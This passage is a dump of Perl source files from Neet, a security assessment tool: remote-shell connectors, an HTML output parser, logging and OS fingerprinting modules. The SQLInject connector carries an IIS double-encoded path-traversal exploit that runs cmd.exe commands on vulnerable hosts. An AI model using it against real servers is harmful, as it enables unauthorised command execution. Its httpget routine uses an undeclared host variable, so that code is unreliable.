$RCE{"Host"}="$RequiredArgs{'Defaults'}{'Host'}" if (!$RCE{"Host"}); 61 | $RCE{"Port"}="$RequiredArgs{'Defaults'}{'Port'}" if (!$RCE{"Port"}); 62 | $RCE{"Key"}="$RequiredArgs{'Defaults'}{'Key'}" if (!$RCE{"Key"}); 63 | my $rce; 64 | if (!defined($RCE{'KeyFile'})){ 65 | $rce=RCE->new('ServerAddr'=>$RCE{"Host"}, 'RCEPort'=>$RCE{"Port"}, 'Key'=>$RCE{'Key'}); 66 | } else { 67 | $rce=RCE->new('ServerAddr'=>$RCE{"Host"}, 'RCEPort'=>$RCE{"Port"}, 'KeyFile'=>$RCE{'KeyFile'}); 68 | } 69 | if ($rce){ 70 | $RCE{"Connected"}=1; 71 | $RCE{'Handle'}=$rce; 72 | } else { 73 | return undef; 74 | } 75 | $RCE{'Type'}="Windows"; 76 | $RCE{'RequiredArgs'}=\%RequiredArgs; 77 | 78 | my $ConnectorObject=\%RCE; 79 | bless $ConnectorObject, $PKG; 80 | return $ConnectorObject; 81 | } 82 | 83 | sub test { 84 | my $OBJ=shift(); 85 | my $out=$OBJ->execute("ver"); 86 | if ($out){ 87 | return 1; 88 | } 89 | return 0; 90 | } 91 | 92 | sub execute { 93 | my $OBJ=shift(); 94 | my $command=shift(); 95 | my $rce=${$OBJ}{'Handle'}; 96 | my @result; 97 | my $output=$rce->Execute("$command"); 98 | @result = split /\n/, $output if ($output); 99 | return @result; 100 | } 101 | 102 | sub ServerTime { 103 | my $OBJ=shift(); 104 | my @result=$OBJ->execute("echo . | date"); 105 | my $date=$result[0]; 106 | $date=substr($date,index($date,"is:")+4,length($date)-(index($date,"is:")+4)); 107 | @result=$OBJ->execute("echo . | time"); 108 | my $time=$result[0]; 109 | $time=substr($time,index($time,"is:")+4,length($time)-(index($time,"is:")+4)); 110 | return "$date$time"; 111 | } 112 | 113 | sub OS { 114 | my $OBJ=shift(); 115 | my @result=$OBJ->execute("ver"); 116 | return $result[1]; 117 | } 118 | 119 | sub Args { 120 | my $OBJ=shift(); 121 | return %{$$OBJ{'RequiredArgs'}}; 122 | } 123 | 124 | sub Server { 125 | my $OBJ=shift(); 126 | my @result=$OBJ->execute("ver"); 127 | return $result[1]; 128 | } 129 | 130 | sub BaseDir { 131 | my $OBJ=shift(); 132 | my @result=$OBJ->execute("cd"); 133 | return $result[0]; 134 | } 135 | 136 | sub Environment { 137 | my $OBJ=shift(); 138 | my @result=$OBJ->execute("set"); 139 | my %env; 140 | for my $line (@result){ 141 | next if (!$line); 142 | my ($var,$val)=split "=", $line; 143 | $env{$var}=$val; 144 | } 145 | return %env; 146 | } 147 | 148 | sub disconnect { 149 | my $OBJ=shift(); 150 | return 0; 151 | } 152 | 153 | sub close { 154 | my $OBJ=shift(); 155 | return disconnect($OBJ); 156 | } 157 | 158 | sub register { 159 | # Gets called at installation time 160 | eval { 161 | require JR::Catalog; 162 | }; 163 | if ($@){ 164 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 165 | return 0; 166 | } 167 | my $reg=Catalog->new; 168 | if (!$reg->isRegistered("Module"=>"ConnectorNativeMSSQL")){ 169 | return $reg->Register("Type"=>"iShellConnector","Object"=>"NativeMSSQL","Module"=>"ConnectorNativeMSSQL"); 170 | } 171 | return 0; 172 | } 173 | 174 | 1; 175 | -------------------------------------------------------------------------------- /content/main/JR/iShell/ConnectorSQLInject.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # JR::ConnectorSQLInject.pm 24 | 25 | # This is the "IIS Unicode" connector for the ishell command shell framework. 26 | # Jonathan Roach 27 | 28 | # It uses HTTP/HTTPS to obtain command execution on vulnerable hosts. 29 | 30 | # All connectors should provide the same base interface to the calling iShell. 31 | # new -> create a new instance of the connector. This should only return a connector object 32 | # if the initial connection succeeds 33 | # test -> test for command shell capabilities. Should return 1 for "yes, we have a shell" or 34 | # otherwise 0 35 | # execute -> execute this system command - returns an array of output 36 | # ServerTime -> get the date/time from the server 37 | # OS -> get the OS version 38 | # Server -> get the Server version 39 | # Args -> return a hash of parameters that should be supplied. 40 | # BaseDir -> get the directory that the exploited service is based 41 | # Environment -> get a hash of the environment variables 42 | # disconnect -> Close the connection 43 | 44 | 45 | use strict; 46 | 47 | package JR::iShell::ConnectorSQLInject; 48 | use IO::Socket; 49 | use JR::iShell::OutputIsolator; 50 | 51 | sub new { 52 | my $PKG=shift(); 53 | my %SQLSite=@_; 54 | my %Connector; 55 | 56 | my %RequiredArgs; 57 | $RequiredArgs{'Args'}="URL SSL"; 58 | $RequiredArgs{'Optional'}="SSL"; 59 | $RequiredArgs{'Mandatory'}="URL"; 60 | $RequiredArgs{'Defaults'}{'SSL'}="0"; 61 | $RequiredArgs{'Defaults'}{'URL'}="http://localhost/"; 62 | 63 | $SQLSite{"URL"}="$RequiredArgs{'Defaults'}{'URL'}" if (!$SQLSite{"URL"}); 64 | $SQLSite{'SSL'}="$RequiredArgs{'Defaults'}{'SSL'}" if (!$SQLSite{"SSL"}); 65 | 66 | $SQLSite{'Type'}="Windows"; 67 | $SQLSite{'SysPath'}="..%255c..%255c..%255cwinnt/system32/"; 68 | $SQLSite{'Path'}=$SQLSite{'SysPath'}; 69 | $SQLSite{'CommandInterpreter'}="cmd.exe"; 70 | $SQLSite{'RequiredArgs'}=\%RequiredArgs; 71 | 72 | $SQLSite{'HTMLobj'}=new OutputIsolator(); 73 | my $ConnectorObject=\%SQLSite; 74 | bless $ConnectorObject, $PKG; 75 | return $ConnectorObject; 76 | } 77 | 78 | sub test { 79 | print "TESTING\n"; 80 | my $SQLSite=shift(); 81 | my $OutputIsolator=$$SQLSite{'HTMLobj'}; 82 | my $teststring="__OutputIsolatorCalibration__OICalibrate__"x3; 83 | for (my $a=0; $a<10; $a++){ 84 | # This is not required to be cryptographically strong!! :-) 85 | $teststring .= int(rand(1000)); 86 | } 87 | print "Calibrating...\n"; 88 | until ($OutputIsolator->isCalibrated){ 89 | $OutputIsolator->LoadPage($SQLSite->_subSubmit("echo $teststring")); 90 | $OutputIsolator->Calibrate("$teststring"); 91 | } 92 | print "Calibrated at " . $$OutputIsolator{'Index'} . "\n"; 93 | 94 | my @results=$SQLSite->execute("ver"); 95 | my $ok=0; 96 | for my $line (@results){ 97 | if ($line =~ /^Microsoft/){ 98 | $ok=1; 99 | } 100 | } 101 | return $ok; 102 | } 103 | 104 | sub execute { 105 | my $SQLSite=shift(); 106 | my $OutputIsolator=$$SQLSite{'HTMLobj'}; 107 | my $fullcommand=shift(); 108 | my $exe=$$SQLSite{'CommandInterpreter'}; 109 | my $path=$$SQLSite{'Path'}; 110 | my @commands = split "&&", $fullcommand; 111 | my @newcommand; 112 | for my $command (@commands){ 113 | $command =~ s/^\s+//; 114 | if ($command =~ /xcopy /){ 115 | $exe="xcopy.exe"; 116 | $path=$$SQLSite{'SysPath'}; 117 | $command =~ s/xcopy //; 118 | pop @newcommand; 119 | } 120 | if ($command =~ /net /){ 121 | $exe="net.exe"; 122 | $path=$$SQLSite{'SysPath'}; 123 | $command =~ s/net //; 124 | pop @newcommand; 125 | } 126 | if ($command =~ /net1 /){ 127 | $exe="net1.exe"; 128 | $path=$$SQLSite{'SysPath'}; 129 | $command =~ s/net1 //; 130 | pop @newcommand; 131 | } 132 | if ($command =~ /attrib /){ 133 | $exe="attrib.exe"; 134 | $path=$$SQLSite{'SysPath'}; 135 | $command =~ s/attrib //; 136 | pop @newcommand; 137 | } 138 | push @newcommand, $command; 139 | } 140 | my $command=join "&& ", @newcommand; 141 | $command = "/c+" . $command if (("$exe" eq "$$SQLSite{'CommandInterpreter'}") || ("$exe" eq "cmd.exe")); 142 | $exe = $path . $exe; 143 | my $cmd="/scripts/" . $exe . "?$command"; 144 | my @res=$SQLSite->httpget($cmd); 145 | $OutputIsolator->LoadPage(@res); 146 | my @results=$OutputIsolator->GetOutput; 147 | return @results; 148 | } 149 | 150 | sub _subSubmit { 151 | my $SQLSite=shift(); 152 | my $command=shift(); 153 | my $exe=$$SQLSite{'Path'} . $$SQLSite{'CommandInterpreter'}; 154 | my $cmd="/scripts/" . $exe . "?/c+$command"; 155 | my @result=$SQLSite->httpget($cmd); 156 | return @result; 157 | } 158 | 159 | sub ServerTime { 160 | my $OBJ=shift(); 161 | return $$OBJ{'Date'}; 162 | } 163 | 164 | sub OS { 165 | my $OBJ=shift(); 166 | my @result=$OBJ->execute("ver"); 167 | return $result[1]; 168 | } 169 | 170 | sub Args { 171 | my $OBJ=shift(); 172 | return %{$$OBJ{'RequiredArgs'}}; 173 | } 174 | 175 | sub Server { 176 | my $OBJ=shift(); 177 | return $$OBJ{'Server'}; 178 | } 179 | 180 | sub BaseDir { 181 | my $OBJ=shift(); 182 | my @result=$OBJ->execute("cd"); 183 | return $result[0]; 184 | } 185 | 186 | sub Environment { 187 | my $OBJ=shift(); 188 | my @result=$OBJ->execute("set"); 189 | my %env; 190 | for my $line (@result){ 191 | next if (!$line); 192 | my ($var,$val)=split "=", $line; 193 | $env{$var}=$val; 194 | } 195 | return %env; 196 | } 197 | 198 | sub disconnect { 199 | my $OBJ=shift(); 200 | return 1; 201 | } 202 | 203 | sub close { 204 | my $OBJ=shift(); 205 | return disconnect($OBJ); 206 | } 207 | 208 | sub httpget { 209 | my $SQLSite=shift(); 210 | my $URL=$$SQLSite{'URL'}; 211 | my $Port=80; 212 | my @urltokens=split "/", $URL; 213 | 214 | 215 | 216 | my $cmd = urlencode($URL); 217 | my $headercount=0; my $timeout=10; my $tries=0; 218 | my $headers="Connection: Keep-Alive\r\n"; 219 | my @output; 220 | 221 | 222 | while (!$headercount){ 223 | $tries++; 224 | my $socket = IO::Socket::INET->new('PeerAddr'=>"$Host", 'PeerPort'=>"$Port", 'Proto'=>'tcp', 'Blocking'=>'1', 'Timeout'=>'10'); 225 | print $socket "GET $cmd HTTP/1.1\r\nHost: $Host\r\n$headers\r\n"; 226 | my @raw=<$socket>; 227 | $socket->close; 228 | my $head=1; 229 | for my $line (@raw){ 230 | if ($line !~ /\S/){ 231 | $head=0; 232 | next; 233 | } 234 | if ($head){ 235 | $headercount++; 236 | if ($line =~ /^Server: /){ 237 | $line =~ s/[\r\n]//g; 238 | $$SQLSite{'Server'}=substr($line,index($line," ")+1,length($line)-index($line," ")); 239 | } 240 | if ($line =~ /^Date: /){ 241 | $line =~ s/[\r\n]//g; 242 | $$SQLSite{'Date'}=substr($line,index($line," ")+1,length($line)-index($line," ")); 243 | } 244 | } else { 245 | push @output, $line; 246 | } 247 | } 248 | if ($tries > $timeout) { 249 | print STDERR ("Couldn't get HTTP response\n"); 250 | sleep 5; 251 | return undef; 252 | } 253 | } 254 | return @output; 255 | } 256 | 257 | sub urlencode { 258 | my $string=shift(); 259 | $string =~ s/ /%20/g; 260 | $string =~ s/&/%26/g; 261 | return $string; 262 | } 263 | 264 | 265 | sub register { 266 | # Gets called at installation time 267 | eval { 268 | require JR::Catalog; 269 | }; 270 | if ($@){ 271 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 272 | return 0; 273 | } 274 | my $reg=Catalog->new; 275 | if (!$reg->isRegistered("Module"=>"ConnectorSQLInject")){ 276 | return $reg->Register("Type"=>"iShellConnector","Object"=>"SQLInject","Module"=>"ConnectorSQLInject"); 277 | } 278 | return 0; 279 | } 280 | 281 | 1; 282 | 283 | 284 | -------------------------------------------------------------------------------- /content/main/JR/iShell/OutputIsolator.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # This program is free software: you can redistribute it and/or modify 4 | # it under the terms of the GNU General Public License as published by 5 | # the Free Software Foundation, either version 3 of the License, or 6 | # (at your option) any later version. 7 | # 8 | # This program is distributed in the hope that it will be useful, 9 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | # GNU General Public License for more details. 12 | # 13 | # You should have received a copy of the GNU General Public License 14 | # along with this program. If not, see . 15 | # 16 | # Contact: jonnyhightower [at] funkygeek.com 17 | # 18 | ########################################################################## 19 | 20 | # JR::OutputIsolator.pm 21 | 22 | # Jonathan Roach 23 | 24 | use strict; 25 | 26 | package JR::iShell::OutputIsolator; 27 | 28 | 29 | sub new { 30 | my $PKG=shift(); 31 | my (@HTML,@Tokens,$SHTML,%HTMLObj); 32 | my @Containers=("html","head","title","body","table","td","tr","div","pre"); 33 | $HTMLObj{'Raw'}=\@HTML; 34 | $HTMLObj{'Tokens'}=\@Tokens; 35 | $HTMLObj{'Page'}=\$SHTML; 36 | $HTMLObj{'Calibrated'}=0; 37 | $HTMLObj{'Index'}=0; 38 | $HTMLObj{'Containers'}=\@Containers; 39 | my $Object=\%HTMLObj; 40 | bless $Object, $PKG; 41 | return $Object; 42 | } 43 | 44 | sub LoadPage { 45 | my $obj=shift(); 46 | my $serial; 47 | @{$$obj{'Raw'}}=(@_); 48 | for my $line (@{$$obj{'Raw'}}){ 49 | $serial .= $line if ($line); 50 | } 51 | $$obj{'Page'}=$serial; 52 | } 53 | 54 | sub Calibrate { 55 | my $obj=shift(); 56 | my $string=lc(shift()); 57 | my $lcpage=lc($$obj{'Page'}); 58 | if ($lcpage !~ /$string/){ 59 | $obj->FlushPage; 60 | die ("****CANNOT CALIBRATE ****\n$lcpage\n****CANNOT CALIBRATE ****\n" . 61 | "The required output string was not found in the returned HTML\n"); 62 | } 63 | $obj->_SerialisedTokenise($lcpage); 64 | for my $token (@{$$obj{'Tokens'}}){ 65 | last if ("$token" eq "$string"); 66 | for my $cont (@{$$obj{'Containers'}}){ 67 | if ($token =~ /<$cont[\s>]/){ 68 | $$obj{'Index'}++; 69 | last; 70 | } 71 | } 72 | } 73 | 74 | $obj->isCalibrated(1) if ($$obj{'Index'} > 0); 75 | $obj->FlushPage; 76 | } 77 | 78 | sub FlushPage { 79 | my $obj=shift(); 80 | @{$$obj{'Tokens'}}=(); 81 | @{$$obj{'Raw'}}=(); 82 | $$obj{'Page'}=""; 83 | return 1; 84 | } 85 | 86 | sub GetOutput { 87 | my $obj=shift(); 88 | return undef if (!$$obj{'Page'}); 89 | $obj->_SerialisedTokenise($$obj{'Page'}); 90 | my $count=0; my $tkindex=0; 91 | for my $token (@{$$obj{'Tokens'}}){ 92 | if ($token =~ /Directory of/){ 93 | # This is one with NO HTML. Let's get out of here 94 | $token =~ s/\r//g; 95 | my @out= split "\\n", $token; 96 | $obj->FlushPage; 97 | return @out; 98 | } 99 | for my $cont (@{$$obj{'Containers'}}){ 100 | if (lc($token) =~ /<$cont[\s>]/){ 101 | $count++; 102 | last; 103 | } 104 | } 105 | last if ($count == $$obj{'Index'}); 106 | $tkindex++; 107 | } 108 | 109 | return $$obj{'Page'} if (!$tkindex); 110 | return ("") if (!${$$obj{'Tokens'}}[$tkindex+1] || $obj->isClosingTag(${$$obj{'Tokens'}}[$tkindex+1]) || (${$$obj{'Tokens'}}[$tkindex+1] !~ /\S/)); 111 | ${$$obj{'Tokens'}}[$tkindex+1] =~ s/\r//g; 112 | my @out= split "\\n", ${$$obj{'Tokens'}}[$tkindex+1]; 113 | $obj->FlushPage; 114 | return @out; 115 | } 116 | 117 | 118 | sub isClosingTag { 119 | my $obj=shift(); 120 | my $tag=shift(); 121 | my $is=0; 122 | for my $cont (@{$$obj{'Containers'}}){ 123 | if (lc($tag) =~ /<\/$cont[\s>]/){ 124 | $is=1; 125 | last; 126 | } 127 | } 128 | return $is; 129 | } 130 | 131 | sub _SerialisedTokenise { 132 | my $obj=shift(); 133 | my $html=shift(); 134 | @{$$obj{'Tokens'}}=(); 135 | my $current; 136 | for (my $a=0; $a < length($html); $a++){ 137 | my $c=substr($html,$a,1); 138 | if ("$c" eq "<"){ 139 | if ($current){ 140 | push @{$$obj{'Tokens'}}, $current; 141 | $current=""; 142 | } 143 | } 144 | if ("$c" eq ">"){ 145 | $current .= $c; 146 | push @{$$obj{'Tokens'}}, $current; 147 | $current=""; 148 | next; 149 | } 150 | $current .= $c; 151 | if ($a > 20 && $current && $current =~ /Directory of/){ 152 | @{$$obj{'Tokens'}}=(); 153 | push @{$$obj{'Tokens'}}, $html; 154 | last; 155 | } 156 | } 157 | } 158 | 159 | sub isCalibrated { 160 | my $Obj=shift(); 161 | my $newval=shift(); 162 | if ($newval){ 163 | $$Obj{'Calibrated'}=1; 164 | return 1; 165 | } else { 166 | return $$Obj{'Calibrated'}; 167 | } 168 | } 169 | 170 | 171 | sub register { 172 | # Gets called at installation time 173 | eval { 174 | require JR::Catalog; 175 | }; 176 | if ($@){ 177 | print STDERR "Couldn't load JR::Catalog. Didn't register.\n"; 178 | return 0; 179 | } 180 | my $reg=Catalog->new; 181 | if (!$reg->isRegistered("Module"=>"OutputIsolator")){ 182 | return $reg->Register("Type"=>"OutputIsolator","Object"=>"OutputIsolator","Module"=>"OutputIsolator"); 183 | } 184 | return 0; 185 | } 186 | 187 | 1; 188 | -------------------------------------------------------------------------------- /content/main/Neet/Logging.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | # Logging.pm 24 | 25 | # Logging for Neet 26 | # Jonathan Roach 27 | package Neet::Logging; 28 | 29 | use Term::ANSIColor qw(:constants); 30 | $Term::ANSIColor::AUTORESET = 1; 31 | use Fcntl ':flock'; 32 | 33 | sub new { 34 | my $pkg=shift(); 35 | my %Logger; 36 | $Logger{'LogFile'}="Logfile"; 37 | $Logger{'Logging'}=0; 38 | $Logger{'AltColour'}=0; 39 | $Logger{'Linestamp'}=0; 40 | my $self=\%Logger; 41 | bless $self, $pkg; 42 | return $self; 43 | } 44 | 45 | sub LogFile { 46 | my $self=shift(); 47 | my $file=shift(); 48 | if (!$file){ 49 | return $$self{'LogFile'}; 50 | } else { 51 | $$self{'LogFile'}=$file; 52 | return 1; 53 | } 54 | } 55 | 56 | sub AltColour { 57 | my $self=shift(); 58 | my $alt=shift(); 59 | if (!defined($alt)){ 60 | return $$self{'AltColour'}; 61 | } else { 62 | $$self{'AltColour'}=$alt; 63 | return 1; 64 | } 65 | } 66 | 67 | sub Linestamp { 68 | my $self=shift(); 69 | my $alt=shift(); 70 | if (!defined($alt)){ 71 | return $$self{'Linestamp'}; 72 | } else { 73 | $$self{'Linestamp'}=$alt; 74 | return 1; 75 | } 76 | } 77 | 78 | sub OpenLog { 79 | my $self=shift(); 80 | my $direct=shift(); 81 | my $FH; 82 | if (open($FH,">>$$self{'LogFile'}")){ 83 | $$self{'LOGHANDLE'}=$FH; 84 | $$self{'Logging'}=1; 85 | if (!$direct){ 86 | $self->Log ("- - - - - - - - - - - -\n"); 87 | $self->Log ("Log opened by PID $$\n"); 88 | } 89 | return 1; 90 | } else { 91 | return 0; 92 | } 93 | } 94 | 95 | sub CloseLog { 96 | my $self=shift(); 97 | my $direct=shift(); 98 | if ($$self{'Logging'}){ 99 | if (!$direct){ 100 | $self->Log ("Log closed\n"); 101 | } 102 | my $FH=$$self{'LOGHANDLE'}; 103 | close $FH; 104 | return 1; 105 | } 106 | return 0; 107 | } 108 | 109 | sub Logging { 110 | my $self=shift(); 111 | return $$self{'Logging'}; 112 | } 113 | 114 | sub LogNoStamp { 115 | my $self=shift(); 116 | return 0 if (!$$self{'Logging'}); 117 | my $entry=shift(); 118 | my $FH=$$self{'LOGHANDLE'}; 119 | chomp $entry; $entry .= "\n"; 120 | print $FH $entry; 121 | return 1; 122 | } 123 | 124 | sub Log { 125 | my $self=shift(); 126 | my $message=shift(); 127 | return 0 if (!$$self{'Logging'}); 128 | $message =~ s/--+//g; 129 | chomp $message; $message .= "\n"; 130 | my $FH=$$self{'LOGHANDLE'}; 131 | my $entry=localtime() . ": $message"; 132 | flock($FH,LOCK_EX); 133 | print $FH $entry; 134 | flock($FH,LOCK_UN); 135 | return 1; 136 | } 137 | 138 | sub Error { 139 | my $self=shift(); 140 | my $text=shift(); 141 | my $direct=shift(); 142 | my ($print,$log)=(1,1); 143 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 144 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 145 | $self->Log("[ERROR] $text") if ($log); 146 | chomp $text; $text .= "\n"; 147 | if ($print){ 148 | if ($$self{'Linestamp'}){ 149 | print STDERR localtime() . " ERROR: $text"; 150 | } else { 151 | print STDERR "ERROR: $text"; 152 | } 153 | } 154 | } 155 | 156 | sub Debug { 157 | my $self=shift(); 158 | my $text=shift(); 159 | my $direct=shift(); 160 | my ($print,$log)=(1,1); 161 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 162 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 163 | $self->Log("[DEBUG] $text") if ($log); 164 | chomp $text; $text .= "\n"; 165 | if ($print){ 166 | if ($$self{'Linestamp'}){ 167 | print YELLOW localtime() . " [DEBUG] $text"; 168 | } else { 169 | print YELLOW "[DEBUG] $text"; 170 | } 171 | } 172 | } 173 | 174 | sub Memo { 175 | my $self=shift(); 176 | my $text=shift(); 177 | $self->Log("[MEMO] $text"); 178 | } 179 | 180 | sub Warn { 181 | my $self=shift(); 182 | my $text=shift(); 183 | my $direct=shift(); 184 | my ($print,$log)=(1,1); 185 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 186 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 187 | $self->Log("[WARN] $text") if ($log); 188 | chomp $text; $text .= "\n"; 189 | if ($print){ 190 | if ($$self{'Linestamp'}){ 191 | print RED localtime() . " $text"; 192 | } else { 193 | print RED "$text"; 194 | } 195 | } 196 | } 197 | 198 | sub Vuln { 199 | my $self=shift(); 200 | my $text=shift(); 201 | my $direct=shift(); 202 | my ($print,$log)=(1,1); 203 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 204 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 205 | $self->Log("[VULN] $text") if ($log); 206 | chomp $text; $text .= "\n"; 207 | if ($print){ 208 | if ($$self{'Linestamp'}){ 209 | print RED localtime() . " [VULN]*** -> $text"; 210 | } else { 211 | print RED "[VULN]*** -> $text"; 212 | } 213 | } 214 | } 215 | 216 | sub Issue { 217 | my $self=shift(); 218 | my $text=shift(); 219 | my $direct=shift(); 220 | my ($print,$log)=(1,1); 221 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 222 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 223 | $self->Log("[ISSUE] $text") if ($log); 224 | chomp $text; $text .= "\n"; 225 | if ($print){ 226 | if ($$self{'Linestamp'}){ 227 | print RED localtime() . " [ISSUE] -> $text"; 228 | } else { 229 | print RED "[ISSUE] -> $text"; 230 | } 231 | } 232 | } 233 | 234 | sub Comp { 235 | my $self=shift(); 236 | my $text=shift(); 237 | my $direct=shift(); 238 | my ($print,$log)=(1,1); 239 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 240 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 241 | $self->Log("[COMP] $text") if ($log); 242 | chomp $text; $text .= "\n"; 243 | if ($print){ 244 | if ($$self{'Linestamp'}){ 245 | print RED localtime() . " [COMP]*** -> $text"; 246 | } else { 247 | print RED "[COMP]*** -> $text"; 248 | } 249 | } 250 | } 251 | 252 | sub OK { 253 | my $self=shift(); 254 | my $text=shift(); 255 | my $direct=shift(); 256 | my ($print,$log)=(1,1); 257 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 258 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 259 | $self->Log("[OK] $text") if ($log); 260 | chomp $text; $text .= "\n"; 261 | if ($print){ 262 | if ($$self{'Linestamp'}){ 263 | print GREEN localtime() . " $text"; 264 | } else { 265 | print GREEN "$text"; 266 | } 267 | } 268 | } 269 | 270 | sub Info { 271 | my $self=shift(); 272 | my $text=shift(); 273 | my $direct=shift(); 274 | my ($print,$log)=(1,1); 275 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 276 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 277 | $self->Log("[INFO] $text") if ($log); 278 | chomp $text; $text .= "\n"; 279 | if ($print){ 280 | if ($$self{'AltColour'}==0){ 281 | if ($$self{'Linestamp'}){ 282 | print WHITE localtime() . " $text"; 283 | } else { 284 | print WHITE "$text"; 285 | } 286 | } else { 287 | if ($$self{'Linestamp'}){ 288 | print BLACK localtime() . " $text"; 289 | } else { 290 | print BLACK "$text"; 291 | } 292 | } 293 | } 294 | } 295 | 296 | sub Status { 297 | my $self=shift(); 298 | my $text=shift(); 299 | my $direct=shift(); 300 | my ($print,$log)=(1,1); 301 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 302 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 303 | $self->Log("[STAT] $text") if ($log); 304 | chomp $text; $text .= "\n"; 305 | if ($print){ 306 | if ($$self{'Linestamp'}){ 307 | print BLUE localtime() . " $text"; 308 | } else { 309 | print BLUE "$text"; 310 | } 311 | } 312 | } 313 | 314 | sub Alert { 315 | my $self=shift(); 316 | my $text=shift(); 317 | my $direct=shift(); 318 | my ($print,$log)=(1,1); 319 | $print=0 if ($direct && "$direct" eq "LOGONLY"); 320 | $log=0 if ($direct && "$direct" eq "PRINTONLY"); 321 | $self->Log("[ALERT] $text") if ($log); 322 | chomp $text; $text .= "\n"; 323 | if ($print){ 324 | if ($$self{'Linestamp'}){ 325 | print RED localtime() . " [ALERT] $text"; 326 | } else { 327 | print RED "[ALERT] $text"; 328 | } 329 | } 330 | } 331 | 332 | sub Exec { 333 | my $self=shift(); 334 | my $text=shift(); 335 | $self->Log("[EXEC] $text"); 336 | } 337 | 338 | 1; 339 | -------------------------------------------------------------------------------- /content/main/Neet/OSDetect.pm: -------------------------------------------------------------------------------- 1 | ########################################################################## 2 | # 3 | # Neet: Network discovery, enumeration and security assessment tool 4 | # Copyright (C) 2008-2016 Jonathan Roach 5 | # 6 | # This program is free software: you can redistribute it and/or modify 7 | # it under the terms of the GNU General Public License as published by 8 | # the Free Software Foundation, either version 3 of the License, or 9 | # (at your option) any later version. 10 | # 11 | # This program is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | # GNU General Public License for more details. 15 | # 16 | # You should have received a copy of the GNU General Public License 17 | # along with this program. If not, see . 18 | # 19 | # Contact: jonnyhightower [at] funkygeek.com 20 | # 21 | ########################################################################## 22 | 23 | #OSDetect.pm 24 | 25 | package Neet::OSDetect; 26 | 27 | sub new { 28 | my $pkg=shift(); 29 | my $file=shift(); 30 | # Store the signatures in memory - cut down on disk accesses 31 | my (%OSD,@Sigs); 32 | if (open(FH,$file)){ 33 | until (eof FH){ 34 | my $line = readline(*FH); 35 | if ($line =~ /^\s/){ 36 | $line =~ s/^\s+//g; 37 | } 38 | if (($line =~ /^\#/) || ($line !~ /\w/) || ($line !~ /\*/)) { 39 | next; 40 | } 41 | chomp $line; 42 | push @Sigs, "$line"; 43 | } 44 | close FH; 45 | } else { 46 | return undef; 47 | } 48 | $OSD{'Sigs'}=\@Sigs; 49 | my $self = \%OSD; 50 | bless $self, $pkg; 51 | return $self; 52 | } 53 | 54 | sub BannerToOS { 55 | my $self=shift(); 56 | my $service=shift(); 57 | my $banner=shift(); 58 | if (!defined($banner)){ 59 | return undef; 60 | } 61 | $banner =~ s/\W//g; 62 | my ($type,$family,$famconf,$version,$verconf,$servicepack,$spconf); 63 | my $c=0; 64 | 65 | # Work out the OS family first 66 | for my $sig (@{$$self{'Sigs'}}){ 67 | next if ($sig !~ /^$service\*/); 68 | my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig); 69 | $b =~ s/\W//g; 70 | next if ($banner !~ /$b/); 71 | ($s,$b)=("",""); 72 | if ($fc && ($fc > $c)){ 73 | $family=$fa; 74 | $type=$ty; 75 | $famconf=$fc; 76 | $c=$fc; 77 | } 78 | } 79 | 80 | return undef if (!$type); 81 | 82 | # Work out the version next 83 | if ($family){ 84 | $c=0; 85 | for my $sig (@{$$self{'Sigs'}}){ 86 | next if ($sig !~ /^$service\*/); 87 | my ($s,$b,$ty,$fa,$fc,$ve,$vc,$sp,$sc)=split ("\\*", $sig); 88 | next if ("$fa" ne "$family"); 89 | $b =~ s/\W//g; 90 | next if ($banner !~ /$b/); 91 | ($s,$b)=("",""); 92 | if ($vc && ($vc > $c)){ 93 | 